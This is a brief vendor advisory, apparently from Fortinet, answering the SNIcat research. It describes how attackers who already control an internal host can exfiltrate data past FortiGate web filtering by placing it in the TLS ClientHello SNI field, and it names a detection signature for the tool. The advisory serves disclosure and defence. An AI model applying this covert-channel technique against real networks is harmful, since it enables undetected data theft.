Technical Tip: Bypassing FortiGate web filter profile by using SNI as a covert channel for Data Exfiltration

This article provides the response of Fortinet for the mnemonic report SNIcat: Circumventing the guardians.

Related document.

https://www.mnemonic.no/blog/introducing-snicat

The main concern of the blog is that the TLS Client Hello packet always reaches the destination server, even if the domain accessed is blacklisted/blocked by a webfilter category in the firewall.

The firewall only blocks the session after the TLS handshake had been completed, but not earlier.

The researchers of the above blog tried to exfiltrate the data through a FortiGate/FortiOS unit that does SSL Deep Inspection, and inject this exfiltrated data in the SNI field of the ClientHello Message.

By doing so, there were able to successfully bypass the web filter profile configured on the device.

To achieve this, the attacker needs to have the control of a host within the internal network from where they can use the SNI tool to exfiltrate the data.

To prevent the exploit from getting into the network and to detect the traffic patterns of the commands sent by the tool, Fortinet issued the following signatures respectively:

1) Python/SNICat.A!exploit